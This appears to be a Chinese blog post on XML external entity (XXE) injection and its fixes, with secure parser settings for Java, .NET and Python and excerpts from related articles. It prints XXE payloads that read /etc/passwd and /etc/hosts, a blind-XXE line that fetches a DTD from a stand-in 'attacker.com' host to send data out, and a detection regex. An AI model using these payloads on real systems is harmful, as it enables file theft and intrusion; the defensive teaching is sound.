XML外部实体注入与修复方案

于 2025-07-12 07:56:19 发布
阅读量1.2k 收藏 8
点赞数 30
CC 4.0 BY-SA版权
文章标签: java javascript 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zqmattack/article/details/149288246

XML外部实体注入(XXE)是一种严重的安全漏洞,攻击者利用XML解析器处理外部实体的功能来读取服务器内部文件、执行远程请求(SSRF)、扫描内网端口或发起拒绝服务攻击。以下是详细解释和修复方案:

XXE 攻击原理

  1. 外部实体声明
    XML允许定义实体(变量),实体可引用外部资源:

    xml

    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

  2. 实体注入
    攻击者将恶意实体注入XML输入:

    xml

    <data>&xxe;</data>

    解析器会将 &xxe; 替换为 /etc/passwd 文件内容。

  3. 攻击类型

    • 读取本地文件(file://

    • 发起HTTP请求(http://)→ SSRF

    • 拒绝服务(Billion Laughs 攻击)

    • 端口扫描(结合SSRF)

修复方案

1. 禁用外部实体处理(根本方案)

Java (SAX/DOM)

java

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

.NET (XmlReader)

csharp

var settings = new XmlReaderSettings {
  DtdProcessing = DtdProcessing.Prohibit,
  XmlResolver = null  // 禁用解析器
};

Python (lxml)

python

from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
2. 使用安全的XML库

  • 优先选择默认禁用外部实体的库:

    • Java: OWASP Java Encoderjackson-dataformat-xml

    • Python: defusedxml(替代标准库)

      python

      from defusedxml.ElementTree import parse
parse(xml_file)
3. 输入验证与过滤

  • 过滤用户输入的 <!DOCTYPE> 和 <!ENTITY> 声明

  • 使用正则表达式拦截敏感关键字(临时缓解):

    regex

    <!ENTITY.*?SYSTEM|file:|http:
4. 输出编码

避免直接输出XML解析结果,使用HTML编码:

java

String safeOutput = Encode.forHtmlContent(rawXMLOutput);
5. 服务器层防御

  • WAF规则:拦截包含 ENTITYSYSTEM 等关键词的请求

  • 文件权限:限制应用账户对系统文件的访问权限

XXE 检测方法

  1. 手动测试
    提交测试Payload:

    xml

    <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hosts"> ]>
<data>&xxe;</data>

  2. 自动化工具

    • OWASP ZAP、Burp Suite Professional(主动扫描)

    • XXEinjector(自动化利用工具)

额外注意事项

  • 依赖库风险:即使代码安全,底层库(如Log4j 1.x)可能引入XXE

  • 非文件协议攻击:防范 php://filtergopher:// 等协议

  • 盲XXE:通过DNS查询或HTTP请求外带数据(需配置外部DTD)

    xml

    <!ENTITY % payload SYSTEM "file:///secret">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;

修复后验证

  1. 使用单元测试覆盖XXE攻击场景

  2. 定期进行安全扫描(SAST/DAST)

  3. 渗透测试:尝试读取 /etc/passwd 或触发DNS查询

关键原则:始终禁用DTD和外部实体解析。大多数现代XML解析器提供了明确的开关选项,启用安全配置是防御XXE的核心。

Xml外部实体注入漏洞(XXE)防护
xiaoyi52的专栏
09-12 2万+
Xml外部实体注入(XXE) 除了json外,xml也是一种常用的数据传输格式。对xml的解析有以下几种常用的方式:DOM,SAX,JDOM,DOM4J,StAX等。然而这几种解析方式都可能会出现外部实体注入漏洞,如微信支付的回调就出现过(见参考资料2)。 XML文档结构包括xml声明,DTD文档类型定义(可选)和文档元素,如下图所示: DTD的作用是定义XML文档的合法构建模块,可以...
PHP XXE漏洞
weixin_30849591的博客
01-24 1155
PHP xml 外部实体注入漏洞(XXE) 1.环境 PHP 7.0.30Libxml 2.8.0Libxml2.9.0 以后 ,默认不解析外部实体,对于PHP版本不影响XXE的利用 2.原理介绍 XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、...
XML 外部实体 (XXE) 漏洞及其修复方法
allway2的博客
07-27 6579
PHP拥有可能是最流行的后端Web应用程序语言的称号,因此,它是攻击者的主要目标,包括XXE攻击。由于攻击者经常发现新的漏洞,因此必须保持您的PHP版本是最新的以保护您的应用程序。它们不能用于获取二进制文件,或包含类似于XML但实际上不是有效XML的代码的文件。XXE(XML外部实体注入)是一种常见的基于Web的安全漏洞,它使攻击者能够干扰Web应用程序中XML数据的处理。虽然是一个常见的漏洞,但通过良好的编码实践和一些特定于语言的建议,可以轻松实现防止XXE攻击。...
【Web漏洞探索】外部实体注入漏洞
kjcxmx的博客
07-19 1241
外部实体注入漏洞XXE(XMLExternalEntityInjection)也就是XML外部实体注入XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。file//和ftp//等协议,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。不允许XML中含有自己定义的DTD。...
XXE外部实体引入漏洞原理及复现
G3et的博客
02-26 949
XXE (XML 外部实体) 是一种安全漏洞,影响解析 XML 输入的应用程序。该漏洞允许攻击者在 XML 文档中注入外部实体, DTD 可以在 XML 文档中引用外部实体。如果 XML 解析器未正确验证外部实体的内容,攻击者可以利用 XXE 漏洞读取系统的机密数据,或者在恶意 DTD 文件中执行任意代码。当应用程序未能正确处理传入的 XML 数据或未限制可以处理的实体类型时,XXE 可能发生。因此,攻击者可以构造一个包含外部实体的恶意 XML 文档,该外部实体由脆弱的应用程序处理。
【网络安全】web漏洞-xml外部实体注入(XXE)
ZL_1618的博客
01-06 1457
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。
xxe-xml外部实体注入
nigo134的博客
07-27 3173
一、XXE 是什么 介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将
用友U8 Cloud smartweb2.RPC.d XML外部实体注入漏洞
Keepb1ue的博客
01-05 1650
用友U8cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型、集团型企业,提供企业级云ERP整体解决方案。它包含ERP的各项应用,包括iUAP、财务会计、iUFO cloud、供应链质量管理、人力资源、生产制造、管理会计、资产管理,以及电商通、U会员、U订货、友云采、友报账、友空间、友人才等用友云服务。
Xxe外部实体注入XML External Entity Injection)
xuyunpeng3189的博客
01-23 1253
无回显的xxe怎么利用 (1)使用dnslog平台进行数据外带 (2)构造远程dtd文件造成文件外泄 Xxe详细防御方法 禁用外部实体 这是防范最为严格的手段,从前面的学习我们已经知道XXE的全部利用手段基础都来源于外部实体注入, 也就是如果禁用了外部实体,那么XXE的所有攻击手段都将失效,无法再正常利用。 代码层禁用 PHP: libxml_disable_entity_loader(true); JAVA: DocumentBuilderFactory dbf =DocumentBuil
[Timeline Sec] - CVE-2020-29436:Nexus3 XML外部实体注入复现1
08-03
【CVE-2020-29436:Nexus3 XML外部实体注入复现】 这篇文章主要讨论了CVE-2020-29436,这是一个针对Nexus Repository Manager 3的安全漏洞,该漏洞是由于XML外部实体注入(XXE)引起的。Nexus Repository Manager 3...
JAXB- XML外部实体注入安全代码漏洞(XXE)
qq_24702263的博客
05-15 2188
XXE攻击 (XML External Entity),此漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。 具体的可以看:https://blog.csdn.net/qq_24702263/article/details/106137827 JAXB是什么? JAXB实现了java对象xml之间的转换 package com.jaxb; import java.io.FileInpu
XML 外部实体注入漏洞
qq_40201047的博客
11-14 5104
0x01 XXE(XML外部实体注入)漏洞 1.1 漏洞原因 1.2 漏洞构造方式 1.3 XML可解析的协议 0x02 寻找XXE漏洞隐藏的攻击面 2.1 XInclude攻击 2.2 通过文件上传进行XXE攻击 2.3 通过修改Content-Type头进行XXE攻击 0x03 如何查找和测试XXE漏洞 0x01 XXE(XML外部实体注入)漏洞 1.1 漏洞原因 XML外部实体注入XML Extenrnal Entity Injection),简称XXE漏洞。引发...
XXE攻防——XML外部实体注入
aezwm4109的博客
05-24 2265
转自腾讯安全应急响应中心 一、XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外...
XXE(XML External Entity attack)XML外部实体注入攻击
xiaoi123的博客
08-15 2296
导语   XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。   尽管XXE漏洞已经...
XML文件的解析以及XML外部实体注入防护
热门推荐
u013224189的专栏
11-10 3万+
XML外部实体注入 (XXE防护)
Xml实体注入漏洞姿势总结
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 8360
Xml实体注入漏洞姿势总结
XML外部实体注入总结(XXE靶机复现)
Aiwin的博客
05-15 5605
XML外部实体注入,Vuln-XXE靶机复现和无回显XXE的使用
XXE漏洞详解(XML外部实体注入)
谢公子的博客
01-12 1万+
目录 XXE XXE漏洞演示利用 Blind OOB XXE 场景1 – 端口扫描 场景2 – 通过DTD窃取文件 场景3 – 远程代码执行 XXE漏洞的挖掘 XXE的防御 在学习XXE漏洞之前,我们先了解下XML。传送门——>XML和JSON数据格式 那么什么是XXE漏洞呢? XXE XXE(XML ExternalEntity Injection)也就是XML...
XML注入漏洞修复参考
煜铭2011
06-20 3177
XML注入漏洞修复参考 1. 漏洞背景 可扩展标记语言 (Extensible Markup Language, XML) ,用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 XML是标准通用标记语言 (SGML) 的子集,非常适合 Web传输。XML 提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据。发现目前一些普遍使用xml的场景中都存在一种古老的XML实体注入漏洞,这可能导致较为严重的安全问题,使得攻击者可能可
xml外部实体注入
最新发布
04-03
### XXE漏洞原理 XML外部实体注入(XXE,XML External Entity Injection)是一种针对XML解析器的安全漏洞。当应用程序使用不受信任的数据作为输入并将其传递给XML解析器时,如果该解析器未正确配置,则可能允许攻击者定义恶意的外部实体[^1]。 #### 原理概述 XML支持通过`DOCTYPE`声明来引用外部实体文件。这些外部实体可以指向本地文件系统中的资源或远程URL。一旦攻击者能够控制XML输入的内容,他们就可以利用此功能访问敏感信息、执行拒绝服务攻击甚至发起服务器端请求伪造(SSRF)攻击[^4]。 例如,以下是一个简单的XXE攻击示例: ```xml <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo> ``` 上述代码尝试读取目标机器上的`/etc/passwd`文件内容,并将其嵌入到响应中返回给攻击者[^3]。 --- ### 防护措施 为了有效防止XXE攻击的发生,可以从以下几个方面入手实施防护策略: #### 1. **禁用外部实体** 大多数现代XML库都提供了选项用于关闭对外部实体的支持。这是最直接也是最重要的防御方式之一。例如,在libxml2版本2.9.0之后,默认情况下不会自动加载任何外部实体,除非显式启用这一行为[^2]。 对于Java环境下的SAXParserFactory实例化过程来说,可以通过设置特定属性来强化安全性: ```java DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); dbf.setFeature("http://xml.org/sax/features/external-general-entities", false); dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false); ``` 以上代码片段展示了如何通过调整工厂对象的功能特性以杜绝潜在风险点的存在。 #### 2. **升级依赖组件** 确保所使用的第三方库始终处于最新稳定状态非常重要。因为很多旧版软件可能存在已知漏洞而未能及时修复的情况。比如前面提到过的libxml2项目,在其后续迭代过程中逐步增强了关于安全性的考量。 另外值得注意的是,除了单纯依靠更新之外还需要关注官方发布的补丁说明以及迁移指南等内容以便顺利完成过渡工作而不影响现有业务逻辑正常运转。 #### 3. **验证用户提交数据的有效性和合法性** 无论何时接收到来自客户端或其他不可信源发送过来的信息之前都应该先经过严格校验流程再进一步处理下去 。这不仅限于单纯的字符串匹配操作还包括但不限于长度限制检查、字符集范围界定等方面的工作。 #### 4. **采用更安全替代方案** 考虑完全放弃传统基于DOM/SAX模型的传统做法转而选用JSON等形式表达结构化的数据交换需求不失为一种可行的选择方向。毕竟后者天生不具备类似的弱点特征从而大大降低了遭受此类威胁的可能性。 --- ### 结论 综上所述,通过对XXE漏洞形成机制的理解我们可以采取多种有效的预防手段加以应对,其中包括但不限于禁用不必要的功能性模块如外部实体引用能力;定期审查维护相关技术栈保持时俱进的态度积极拥抱新特性带来的改进成果等等。只有这样才能够最大程度保障信息系统免受未知隐患侵害的同时持续提供高质量的服务体验给最终使用者群体带来价值最大化的效果体现出来。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

zqmattack

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值